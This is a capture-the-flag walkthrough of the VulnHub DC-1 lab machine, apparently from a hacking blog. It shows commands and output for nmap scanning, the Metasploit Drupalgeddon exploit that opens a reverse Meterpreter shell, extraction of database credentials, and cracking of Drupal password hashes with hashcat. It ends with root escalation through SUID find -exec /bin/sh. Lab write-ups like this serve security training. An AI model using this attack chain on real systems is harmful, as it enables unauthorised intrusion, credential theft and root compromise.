VulnHub DC-1

Vulnhub DC-1 CTF Hacking Challenge. With DC-1 machine from Vulnhub we learn Hacking a bit more closely like you are hacking a real machine.

I have discussed all the steps and screenshots along with the output here , which will reduce any confusion , the writeup may seem long due to many screenshots but is actually a 10 minutes to do thing.

Download the VulnHub DC-1 Machine – https://www.vulnhub.com/entry/dc-1,292/

Discover machine on network by netdiscover or nmap range scanning
netdiscover your whole network or if you know the interface on which vmware is connected vmnet0, vmnet1 (Host-Only) or vmnet8(NAT)
netdiscover -i vmnet8
Added machine IP to /hosts file with name dc-1
now run nmap scan to get what are the ports open, services running and their version numbers

root@ETHICALHACKX:~# nmap -sSV -p- -T5 -Pn -A dc-1
-SV to get the services and version number of services
-p- to scan all ports
-T5 to scan at insane speed, donot do this in production environment as any basic firewall IPS/IDS will detect this, you may go with -T3 or lower.
-Pn no ping as we know the host is up
-A for aggressive scan
dc-1 is machine name I put in hosts file against the IP, you may use the IP address here

Now on running the nmap command in terminal the Output is

root@ETHICALHACKX:~# nmap -sSV -p- -T5 -Pn -A dc-1
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-12 11:54 IST
 Nmap scan report for dc-1 (172.16.241.130)
 Host is up (0.00066s latency).
 Not shown: 65531 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
 | ssh-hostkey: 
 |   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
 |   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
 |_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
 80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
 |http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/  | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt  | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt  |/LICENSE.txt /MAINTAINERS.txt
 |http-server-header: Apache/2.2.22 (Debian) |_http-title: Welcome to Drupal Site | Drupal Site 111/tcp   open  rpcbind 2-4 (RPC #100000) | rpcinfo:  |   program version   port/proto  service |   100000  2,3,4        111/tcp  rpcbind |   100000  2,3,4        111/udp  rpcbind |   100024  1          40833/udp  status |100024  1          55465/tcp  status
 55465/tcp open  status  1 (RPC #100024)
 MAC Address: 00:0C:29:8E:EE:70 (VMware)
 Device type: general purpose
 Running: Linux 3.X
 OS CPE: cpe:/o:linux:linux_kernel:3
 OS details: Linux 3.2 - 3.16
 Network Distance: 1 hop
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
 HOP RTT     ADDRESS
 1   0.66 ms dc-1 (172.16.241.130)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds
nmap scan of dc-1

So from above nmap result we see we have Drupal 7 hosted at port 80
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian)) Running Drupal
111/tcp open rpcbind 2-4 (RPC #100000)

We have some attack surface here and we proceed with Drupal, opening the Mahcine IP in our browser to explore Drupal 7.
We can try some user enumeration to see if we are lucky on Drupal Login page.
Or jump to exploits to see if we have anything in our arsenal against Drupal 7.

Vulnhub DC-1 Drupal 7

In metasploit we search Drupal Exploits

search drupal
Search drupal in metasploit

From the list we get, we choose one of the exploits and use it by use exploit

msf5 > search drupal
Matching Modules
#  Name                                           Disclosure Date  Rank       Check  Description
---- --------------- ---- ----- ----------- 0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection 1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution

We should choose one with Rank Excellent, altough not mandatory.
So we choose – > exploit/multi/http/drupal_drupageddon
in msfconsole type – use exploit/multi/http/drupal_drupageddon
To see available options in this particular exploit type show options.

msf5 > use exploit/multi/http/drupal_drupageddon
 msf5 exploit(multi/http/drupal_drupageddon) > show options
 Module options (exploit/multi/http/drupal_drupageddon):
 Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][…]
    RHOSTS                      yes       The target address range or CIDR identifier
    RPORT      80               yes       The target port (TCP)
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       The target URI of the Drupal installation
    VHOST                       no        HTTP server virtual host
 Exploit target:
 Id  Name
    --  ----
    0   Drupal 7.0 - 7.31 (form-cache PHP injection method)

set RHOST as dc-1 or the machine IP

msf5 exploit(multi/http/drupal_drupageddon) > set rhost dc-1
 rhost => dc-1

Now we are all set to launch the exploit so type run or exploit.

msf5 exploit(multi/http/drupal_drupageddon) > run
  Started reverse TCP handler on 172.16.241.1:4444   
Sending stage (38247 bytes) to 172.16.241.130
 [*] Meterpreter session 1 opened (172.16.241.1:4444 -> 172.16.241.130:34030) at 2019-08-12 12:20:59 +0530
 meterpreter > 

Finally we have a reverse meterpreter shell here.So once we are in the machine the one thing to do is find who you are : user, this will let us know our permission. Type getuid

meterpreter > getuid
 Server username: www-data (33)

Going through files in current directory by ‘ls’ gave us our first flag1.txt

meterpreter > ls
 Listing: /var/www
 .
 .
flag1

Viewing the contents of flag1.txt we get another hint. Pointing towards the Drupal CMS Config file.

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.

I searched on Google to know that Drupal Config File is at – sites/default/settings.php

meterpreter > cd sites/default
 meterpreter > ls
 Listing: /var/www/sites/default
 Mode              Size   Type  Last modified              Name
 ----              ----   ----  -------------              ----
 100644/rw-r--r--  23202  fil   2013-11-21 02:15:59 +0530  default.settings.php
 40775/rwxrwxr-x   4096   dir   2019-02-19 18:40:31 +0530  files
 100444/r--r--r--  15989  fil   2019-02-19 19:18:01 +0530  settings.php

We view the content of file settings.php again we type cat settings.php

meterpreter > cat settings.php
 <?php
 /**
  *
 flag2
 Brute force and dictionary attacks aren't the
 only ways to gain access (and you WILL need access).
 What can you do with these credentials?
 *
 */ 
 $databases = array (
   'default' => 
   array (
     'default' => 
     array (
       'database' => 'drupaldb',
       'username' => 'dbuser',
       'password' => 'R0ck3t',
       'host' => 'localhost',
       'port' => '',
       'driver' => 'mysql',
       'prefix' => '',

Here we get our second flag on top of the file, which is also the username and password to drupal database of dc-1

Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?

We spawn a python shell to access database, a ttp or pseudo-tty shell.

python -c 'import pty; pty.spawn("/bin/sh")'

We browse the drupal database now. Find something worth here.

meterpreter > shell
Process 3436 created.
Channel 2 created.
python -c 'import pty; pty.spawn("/bin/sh")'
$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 137

Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;

show databases;
+--------------------+

| Database           |

+--------------------+

| information_schema |

| drupaldb           |

+--------------------+

2 rows in set (0.00 sec)

So we explore drupal db further, we might have some usernames and passwords here.

mysql> use drupaldb;
 use drupaldb;
 Reading table information for completion of table and column names
 You can turn off this feature to get a quicker startup with -A
 Database changed
 mysql> 
 We try to find something useful in Drupladb database, like users table.
 mysql> show tables;
 show tables;
 +-----------------------------+
 | Tables_in_drupaldb          |
 +-----------------------------+
 | actions                     |
 | authmap                     |
 | batch                       |
 | block                       |
 | block_custom                |
 | block_node_type             |
 | block_role                  |
 | blocked_ips                 |
 | cache                       |
 | cache_block                 |
 | cache_bootstrap             |
 | cache_field                 |
 | cache_filter                |
 | cache_form                  |
 | cache_image                 |
 | cache_menu                  |
 | cache_page                  |
 | cache_path                  |
 | cache_update                |
 | cache_views                 |
 | cache_views_data            |
 | comment                     |
 | ctools_css_cache            |
 | ctools_object_cache         |
 | date_format_locale          |
 | date_format_type            |
 | date_formats                |
 | field_config                |
 | field_config_instance       |
 | field_data_body             |
 | field_data_comment_body     |
 | field_data_field_image      |
 | field_data_field_tags       |
 | field_revision_body         |
 | field_revision_comment_body |
 | field_revision_field_image  |
 | field_revision_field_tags   |
 | file_managed                |
 | file_usage                  |
 | filter                      |
 | filter_format               |
 | flood                       |
 | history                     |
 | image_effects               |
 | image_styles                |
 | menu_custom                 |
 | menu_links                  |
 | menu_router                 |
 | node                        |
 | node_access                 |
 | node_comment_statistics     |
 | node_revision               |
 | node_type                   |
 | queue                       |
 | rdf_mapping                 |
 | registry                    |
 | registry_file               |
 | role                        |
 | role_permission             |
 | search_dataset              |
 | search_index                |
 | search_node_links           |
 | search_total                |
 | semaphore                   |
 | sequences                   |
 | sessions                    |
 | shortcut_set                |
 | shortcut_set_users          |
 | system                      |
 | taxonomy_index              |
 | taxonomy_term_data          |
 | taxonomy_term_hierarchy     |
 | taxonomy_vocabulary         |
 | url_alias                   |
 | users                       |
 | users_roles                 |
 | variable                    |
 | views_display               |
 | views_view                  |
 | watchdog                    |
 +-----------------------------+
 80 rows in set (0.00 sec)

We check the users table if we get anything here.

mysql> select * from users;
 select * from users;
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 | uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 |   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
 |   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1563777450 | 1563777450 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
 |   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 3 rows in set (0.00 sec)

So we have username and password in hash form here which we will ofcourse try to decode by hashcat or any other application of your choice, which you prefer.

I have copied the hash into a seperate file say hash.txt and I will use one of the Kali Linux default wordlist – rockyou.txt. You can locate rockyou .txt by locate rockyou.txt

root@ETHICALHACKX:~# hashcat -m 7900 hash.txt rockyou.txt

After the hash is decrypted we know the admins password is – 53cr3t

So now we login to Drupal Website of dc-1 and explore further , under contents menu we find the third flag – flag3 which says

Special PERMS will help FIND the passwd – but you’ll need to -exec that command to work out how to get what’s in the shadow.

The SUID bit allows an application to be run as root, even when a different user is running it. So run the command to find out.

find / -perm -u=s -type f 2>/dev/null
mysql> exit                                 
 exit
 Bye
 $ find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
 /bin/mount
 /bin/ping
 /bin/su
 /bin/ping6
 /bin/umount
 /usr/bin/at
 /usr/bin/chsh
 /usr/bin/passwd
 /usr/bin/newgrp
 /usr/bin/chfn
 /usr/bin/gpasswd
 /usr/bin/procmail
 /usr/bin/find
 /usr/sbin/exim4
 /usr/lib/pt_chown
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /sbin/mount.nfs

So we see find command has SUID bit set, means we can execute find command as root, we earlier saw we are actually www-data , but executing find will run it as root.

We take a look at passwd file, that is always an interesting thing to do in Linux.

pwd
 /var/www/sites/default
 $ cat /etc/passwd
 cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 statd:x:102:65534::/var/lib/nfs:/bin/false
 messagebus:x:103:107::/var/run/dbus:/bin/false
 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::

Guess what, we see flag4 in passwd file. So we again crack the password , which is a hash. Same as earlier use john or hashcat….

the flag4 values are altered in pic because I was having fun with the machine.

Now the final flag, lets navigate to /root. and We see an error, so lets elevate our privileges. Lets check if we can.

find ethicalhackx -exec "/bin/sh" \;

now check user by whoami — and we are root
Lets get the final flag.

whoami 
root
pwd
/tmp
cd ..
cd root
ls
thefinalflag.txt
cat thefinalflag.txt
Well done!!!! Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

So this Vulnhub machine is done, we will post more interesting CTFs soon. and each steps in every CTF will be covered in detail in a separate post.

What Do You Think on This ? Say Here